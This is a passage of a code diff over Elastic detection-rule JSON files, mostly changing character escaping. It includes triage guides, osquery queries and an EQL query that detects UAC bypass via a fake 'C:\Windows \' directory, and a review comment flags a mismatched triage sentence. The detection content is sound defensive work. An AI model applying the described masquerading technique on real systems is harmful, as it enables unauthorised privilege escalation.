Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n",
 "references": [
 "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e"
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
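Review bot: The investigation step `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.` in the new `note` string points at a registry modification this rule never observes: the `query` three lines below matches only process `start` events whose `process.args` carry a trailing-space `C:\Windows \` path, so the sentence reads as carried over from a registry-based guide. Suggest `...searching for login events (for example, 4624) to the target host after the suspicious process execution.`, which ties the pivot to what actually fired. The identical sentence is in the `note` hunk of the `_109` file further down. These rule files appear to be generated package artifacts, so the wording fix presumably belongs in the upstream rule source rather than a hand edit of the JSON.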
diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json
index 1b68f9222aa..6d33f3a2c35 100644
--- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "UAC Bypass Attempt via Windows Directory Masquerading",
- "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n",
 "references": [
 "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e"
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json
index 005ac8bcc31..1f7e96dcbb2 100644
--- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2917d495-59bd-4250-b395-c29409b76086",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json
index 55ece56de20..2f9c4075aeb 100644
--- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2917d495-59bd-4250-b395-c29409b76086",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json
index 6e5a5d646aa..191d7e4df60 100644
--- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2917d495-59bd-4250-b395-c29409b76086",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json
index 03683f2b3ef..dbaebe4cf7c 100644
--- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2917d495-59bd-4250-b395-c29409b76086",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -110,7 +110,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json
index 69065c241e8..178d967fb4a 100644
--- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2917d495-59bd-4250-b395-c29409b76086",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -110,7 +110,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json
index fbed07ea1e9..29dffcedfe0 100644
--- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json 
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Enumeration of Privileged Local Groups Membership",
- "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to 
add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management 